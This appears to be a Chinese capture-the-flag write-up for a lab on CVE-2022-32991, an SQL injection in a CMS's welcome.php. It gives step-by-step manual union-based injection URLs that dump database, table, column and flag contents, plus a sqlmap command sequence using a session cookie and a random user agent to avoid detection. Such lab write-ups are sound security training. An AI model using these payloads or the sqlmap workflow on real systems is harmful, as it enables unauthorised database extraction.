1、[春秋云镜]CVE-2022-32991

文章目录

  • 一、相关信息
  • 二、解题思路(手注)
  • 三、通关思路(sqlmap)

一、相关信息

  靶场提示:该CMS的welcome.php中存在SQL注入攻击。

  NVD关于漏洞的描述:
1、[春秋云镜]CVE-2022-32991_第1张图片

  注入点不仅在eid处!!!

二、解题思路(手注)

(1)既然NVD说漏洞在welcome.php处,且参数为eid,先注册账号。
1、[春秋云镜]CVE-2022-32991_第2张图片
(2)登录账号后,发现页面就是welcome.php。
1、[春秋云镜]CVE-2022-32991_第3张图片

(3)随便点一个action,点点submit,会发现url中的n参数会变。故,判断是否存在sql注入的payload:eci-2zef3tp09dhdta6qxsqy.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0&n=1‘&t=10(单引号判断法)。

1、[春秋云镜]CVE-2022-32991_第4张图片
1、[春秋云镜]CVE-2022-32991_第5张图片

添加单引号后,页面报错,说明存在SQL注入。

知识点:在参数后面加,无论是字符型还是数字型注入,都会报错。

(4)判断是数字型注入还是字符型注入,payload:http://eci-2zef3tp09dhdta6qxsqy.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0&n=1%27%20and%20%271%27%20=%20%271&t=10

1、[春秋云镜]CVE-2022-32991_第6张图片
http://eci-2zef3tp09dhdta6qxsqy.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0&n=1%27%20and%20%271%27%20=%20%272&t=10
1、[春秋云镜]CVE-2022-32991_第7张图片

知识点:
(1)判断为数字型注入:

  • and 1=1(页面正常);
  • and 1=1 (页面报错)。
    (2)判断为字符型注入:
  • ’ and ‘1’='1(页面正常);
  • ’ and ‘1’='2(页面报错)。

(5)判断有几列,payload:http://eci-2zef3tp09dhdta6qxsqy.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0&n=1%27%20order%20by%20%205%20--+%20%20#&t=10。经判断,表存在五列。
1、[春秋云镜]CVE-2022-32991_第8张图片

知识点:使用order by时,必须保证其之前的语句为真。

(6)判断回显位置,payload:http://eci-2zeayli1t9q3yh3vsp64.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0&n=1%27%20union%20select%201,2,3,4,5--+&t=10
1、[春秋云镜]CVE-2022-32991_第9张图片
(7)数据库名,payload:http://eci-2zeayli1t9q3yh3vsp64.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0&n=1%27%20union%20select%201,2,database(),4,5--+&t=10
1、[春秋云镜]CVE-2022-32991_第10张图片
(8)表名,payload:http://eci-2zeayli1t9q3yh3vsp64.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0&n=1%27%20union%20select%201,2,(select group_concat(table_name) from information_schema.tables where table_schema='security'),4,5--+&t=10
1、[春秋云镜]CVE-2022-32991_第11张图片
(9)字段名,payload:http://eci-2zeayli1t9q3yh3vsp64.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0&n=1%27%20union%20select%201,2,(select group_concat(column_name) from information_schema.columns where table_schema='ctf' and table_name='flag'),4,5--+&t=10
1、[春秋云镜]CVE-2022-32991_第12张图片
(10)字段内容,payload:http://eci-2zeayli1t9q3yh3vsp64.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141b8009cf0&n=1%27%20union%20select%201,2,(select group_concat(concat(flag,'%23')) from ctf.flag),4,5--+&t=10

1、[春秋云镜]CVE-2022-32991_第13张图片

三、通关思路(sqlmap)

注入六连:

  1. sqlmap -u "http://www.xx.com?id=x" (查询是否存在注入点)
  2. --dbs (检测站点包含哪些数据库)
  3. --current-db (获取当前的数据库名)
  4. --tables -D "db_name" (获取指定数据库中的表名 -D后接指定的数据库名称)
  5. --columns -T "table_name" -D "db_name"(获取数据库表中的字段)
  6. --dump -C "columns_name" -T "table_name" -D "db_name" (获取字段的数据内容)

注意:由于该页面采用了登录访问,所以首先想到要使用–cookie参数使得sqlmap绕过身份验证,并添加–user-agent参数或–random-agent使得sqlmap绕过客户端验证,否则可能会被识别到明显的sqlmap客户端标识,从而导致攻击的中断。如:

--cookie="PHPSESSID=k5854nfic1qngm5ul1vmb8pbma"
--user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"

(1)查询是否存在注入点,payload:sqlmap -u 'http://eci-2zec9sqs7bza66gw29ex.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&n=2&t=10 --cookie="PHPSESSID=vq98au2drskf8ltmkv230i719l" --random-agent
1、[春秋云镜]CVE-2022-32991_第14张图片

sqlmap爆破出:该站点存在两个注入点。

(2)检测站点包含哪些数据库,payload:sqlmap -u 'http://eci-2zec9sqs7bza66gw29ex.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&n=2&t=10 --dbs --cookie="PHPSESSID=vq98au2drskf8ltmkv230i719l" --random-agent

1、[春秋云镜]CVE-2022-32991_第15张图片
(3)获取当前数据库名,payload:sqlmap -u 'http://eci-2zec9sqs7bza66gw29ex.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&n=2&t=10 --current-db --batch --cookie="PHPSESSID=vq98au2drskf8ltmkv230i719l" --random-agent

--batch:默认确认,不询问你是否输入。

1、[春秋云镜]CVE-2022-32991_第16张图片
(4)获取指定数据库中的表名。payload:sqlmap -u 'http://eci-2zec9sqs7bza66gw29ex.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&n=2&t=10' --tables -D "ctf" --batch --cookie="PHPSESSID=vq98au2drskf8ltmkv230i719l" --random-agent

1、[春秋云镜]CVE-2022-32991_第17张图片
(5)获取指定数据库表中的字段名,payload:sqlmap -u 'http://eci-2zec9sqs7bza66gw29ex.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&n=2&t=10' --columns -T "flag" -D "ctf" --cookie="PHPSESSID=vq98au2drskf8ltmkv230i719l" --random-agent

1、[春秋云镜]CVE-2022-32991_第18张图片

(6)获取字段的数据内容,payload:sqlmap -u 'http://eci-2zec9sqs7bza66gw29ex.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&n=2&t=10' --dump -C "flag" -T "flag" -D "ctf" --cookie="PHPSESSID=vq98au2drskf8ltmkv230i719l" --random-agent

1、[春秋云镜]CVE-2022-32991_第19张图片

你可能感兴趣的:(春秋云镜,安全)